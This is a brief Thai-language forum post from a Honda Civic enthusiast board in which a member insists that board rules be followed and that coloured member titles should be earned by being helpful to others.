มันเป็นเรื่อง ของระบบระเบียบในบอร์ด ถ้าไม่ทำตามก้อยกเลิกไปก้อแค่นั้น

ถ้าคุนไม่มีระบบระเบียบก้อๆม่ต้องมาตอบ

แตกต่างกันอย่างสิ้นเชิง กับการได้ตัวหนังสือสีนั้นสีนี้ ต้องมีประโยชกะคนอื่น ไม่ได้ไม่มีประโยชแล้วมาได้ กลับสร้างแต่ปัญหาด้วยซ้ำ
ได้รับคำขอบคุณจาก: Turngkung P 11  Champ_civicES  PAE KUNG 
หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
หน้า 1 จาก 7
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.